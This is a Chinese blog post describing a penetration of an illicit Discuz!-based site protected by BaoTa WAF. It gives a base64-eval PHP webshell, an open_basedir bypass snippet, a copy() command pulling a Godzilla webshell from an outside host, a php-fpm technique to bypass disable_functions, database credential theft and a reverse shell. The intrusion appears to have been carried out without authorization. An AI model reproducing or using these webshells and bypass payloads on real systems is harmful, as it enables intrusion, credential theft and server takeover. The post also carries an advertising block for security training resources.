网络安全:绕过MSF的一次渗透测试

这次渗透的主站是 一个Discuz!3.4 的搭建 违法招piao 网站, 配置有宝塔WAF

image.png

用 Discuz!ML 3.X 的漏洞进行攻击,但是没有成功

image.png

发现主站外链会有一个发卡网,引导人们来这充值,是 某某发卡网,而且域名指向也是主站的ip,两个网站在同一个 ,此处忘记截图了

网上有通杀payload,写shell的过程在这里省略了

image.png
由于网站存在宝塔WAF ,写入shell 必须变形一下,将命令进行base64编码在传进去

<?php @eval(base64_decode($_POST['yanshu']));?>

image.png

在phpinfo()里可以看到,宝塔默认会设置 open_basedir 以及 disable_functions,导致蚁剑的shell直接连接之后不大好用,命令执行不了

【一一帮助安全学习,所有资源获取处一一】
①网络安全学习路线(文中提到的)
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍(文中提到的)
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

绕过 open_basedir 查看文件

利用 ini_set() 来 bypass open_basedir 来获取路径名和目录内容,base64 编码之后执行,发现宝塔目录下还有其他站点目录

eval("mkdir('1');chdir('1');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/www/wwwroot'));");

image.png

哥斯拉管理webshell

为了方便查看文件 ,使用哥斯拉马,加密器选择PHP_EVAL_XOR_BASE64,用copy命令传到服务器中,这样流量就可以不会被宝塔waf拦截了

copy('http://xxxx/g.php','/www/wwwroot/xxx.com/g.php');

image.png

哥斯拉马可以自动实现bypass openbase_dir ,读取数据库 用户名密码,可以更改管理员用户进后台或者脱库

image.png

image.png

绕过 disable_functions 执行命令

disable_functions 禁用了 putenv()、mail() 、pcntl_exec() 等函数,环境是php5.6,导致很多常规bypass的方法都用不了

image.png

网站是使用 nginx+php5.6 ,用攻击 php-fpm的办法来bypass,攻击原理可以看 参考链接

先找到php-fpm的配置 如:/www/server/php/56/etc/php-fpm.conf

image.png

或者看nginx的配置 ,得到 php-fpm 的位置 unix:/tmp/php-cgi-56.sock

image.png

首先 选择 PAttackFPM 将模块加载并执行

image.png

再利用哥斯拉马中 bypass disable_functions 的模块 ,成功执行命令

image.png

获取反弹 shell ,可以进一步尝试对主机进行提权了

image.png

  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值